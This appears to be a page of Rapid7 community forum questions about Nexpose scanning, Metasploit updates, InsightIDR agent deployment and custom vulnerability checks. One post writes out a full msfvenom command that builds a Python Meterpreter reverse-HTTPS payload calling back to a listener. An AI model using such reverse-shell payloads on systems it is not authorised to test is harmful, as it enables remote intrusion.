Hello. Nexpose scanner is failing to authenticate via SSH because the configured port is not 22. When setting up the credentials I test them by specifying the correct port and it works just fine, but once I run the scan it doesn't try to authenticate on the specified port 3000 and doesn't even recognize the service as running, thus saying "no credentials used". How can I tell Nexpose that it should authenticate via SSH on a different port? The "restrict to port" field did nothing.
Posted by John Web 13 days ago
Hello all. A little help if possible, please. I am running Kali 2018 v1 with Metasploit v4.17.9-dev. I don't want to update to version 5 because this is not fully compatible with Armitage and I really need this tool due to some courses I teach at my local community. I have noticed that version 4.17 keeps on updating, with version 4.17.84 released a few days ago (https://github.com/rapid7/metasploit-framework/releases/tag/4.17.84). My question is: how do I update my current version of msf without upgrading to v5? apt install metasploit-framework upgrades the entire msf to v5, but I want to keep staying on v4 and receive the updates released. Thank you for your time.
Posted by Alme 14 days ago
I have been trying to deploy the IDR agent using GPO with no luck. I turned on debugging and the installer cannot find the configuration files. I have followed the guide here: https://insightagent.help.rapid7.com/docs/mass-deployments#section-microsoft-group-policy
Here is the error:
Failure: One or more of the following files were not found: config.json, cafile.pem, client.crt, client.key. Make sure you locate these files in the same directory as the installer.
I also used ADSI Edit to add the additional files as follows to the msiFileList variable:
0:\\fs01\Software Deployment\agentInstaller-x86_64.msi
1:\\fs01\Software Deployment\config.json
2:\\fs01\Software Deployment\client.key
3:\\fs01\Software Deployment\client.crt
4:\\fs01\Software Deployment\cafile.pem
Has anyone deployed this successfully with a GPO? Thanks!
Posted by Phil 14 days ago
Hi, I have installed Rapid7 Insight VM in 2016 Server in a VD. When I tried to log in to, for example, 192.168.1.100:3780 from another machine in the same network, I can't get into the security console. Then I disabled the domain firewall in Server 2016 and succeeded in logging in to the security console. I guess it's not best practice to disable the domain firewall. So, does anybody have any idea how to work around this without disabling the firewall? Regards, Monirul
Posted by Monirul B 14 days ago
Hi, does Rapid7 offer a security consultation service? When we use products like AppSpider or InsightAppSec to scan our web applications and generate a report of vulnerabilities, does Rapid7 offer analysis and expert advice on how to fix the vulnerabilities based on the technologies our application uses?
Posted by Nguyen Nguyen 14 days ago
Hello all. Thanks a lot in advance for your consideration. I would like to be able to generate a python/meterpreter/reverse_https payload with the appreciated option StagerVerifySSLCert. After a lot of hours of syntax verification, I can't get this wonderful output before getting a meterpreter session: "Meterpreter will verify SSL Certificate with SHA1 hash". I don't understand where my mistake is, and after having analyzed meterpreter_paranoid_mode.sh I can't reproduce this kind of option for the python payload. Here is the basic command I'm using with no success:
msfvenom -p python/meterpreter/reverse_https StagerVerifySSLCert=true HandlerSSLCert=/root/Desktop/google.pem LHOST=192.168.1.1 LPORT=443 -o /root/Desktop/test.py
Any help would be appreciated. Have a nice day and thanks for reading.
Posted by Eric 16 days ago
We are considering going with Rapid7 for vulnerability scanning. We will have to deploy scan engines at over 150 sites. Does anyone have any suggestions on decently priced Linux boxes that can run Nexpose for site deployment?
Posted by Thomas Clarke 17 days ago
Trying to create an asset group with owner tags in them. When I apply the first owner tag I get all the assets associated correctly. I add the second one and it is supposed to equal out to 26 assets total, but it's either 20 total or 6 total. I have switched the all and any around and nothing changes with applying two tags. What is going on?
Posted by Vanessa villalpando 17 days ago
Not sure whether or not this is a bug, but I have attempted to create a regex based on hostname and would like to make it non-case specific; however, the usual /i does not appear to work, nor does ?i. Has anyone had any luck with this switch in Nexpose?
Posted by Robert DeBellis 17 days ago
Hello, my goal is to have a list of assets and their vulnerabilities, where vulnerability risk score >= 500 and vulnerability severity is critical or severe. It seems like it should be a relatively straightforward query, but I have had no luck yet.
Posted by Will Fulton 18 days ago
Hi, I am looking to write a custom vulnerability scan that will run against the MSSQL databases in my environment and return the results of a SQL query. Ultimately, I am hoping to check for all database accounts that have not changed their password in X days. The following pseudocode uses @@version for simplicity.
<VulnerabilityCheck id="foo" version="1.0" scope="endpoint">
  <NetworkService type="MSSQL">
    <MSSQLQueryResponse>
      <query>SELECT @@version</query>
    </MSSQLQueryResponse>
  </NetworkService>
</VulnerabilityCheck>
I have read through the tutorials in the Knowledge Base, but am still not sure if this is possible. Thanks in advance!
Posted by Rich R 18 days ago
I have started the scanning on one of the assets. It is showing 36 vulnerabilities, and after some time the scan was incomplete. I have scanned with enhanced logging also, and the scan was incomplete with 0 vulnerabilities. Please let us know if there is any solution and how to resolve this. Srini
Posted by Srinivas 18 days ago
Hi, I have found one issue in Nexpose. The remediation team has fixed the issues and I have rescanned the asset. The vulnerability is still existing. I have deleted the asset and rescanned again, and the vulnerability is fixed. I have a lot of asset groups in Nexpose, and deleting and rescanning each and every asset is not possible. Is there any one-time solution for this? Thanks, Srinivas
Posted by Srinivas 19 days ago
Hi all, I'm running a scan for one of our products and I keep getting this error in vulnerabilities. Any idea what is wrong?
<h2> <i>Access is denied.</i> </h2></span> <b> Description: </b>An error occurred while accessing the resources required to serve this request. The server may not be configured for access to the requested URL. <br><br> <b> Error message 401.2.: </b>Unauthorized: Logon failed due to server configuration. Verify that you have permission to view this directory or page based on the credentials you supplied and the authentication methods enabled on the Web server. Contact the Web server's administrator for additional assistance.<br><br>
Posted by Rehan 19 days ago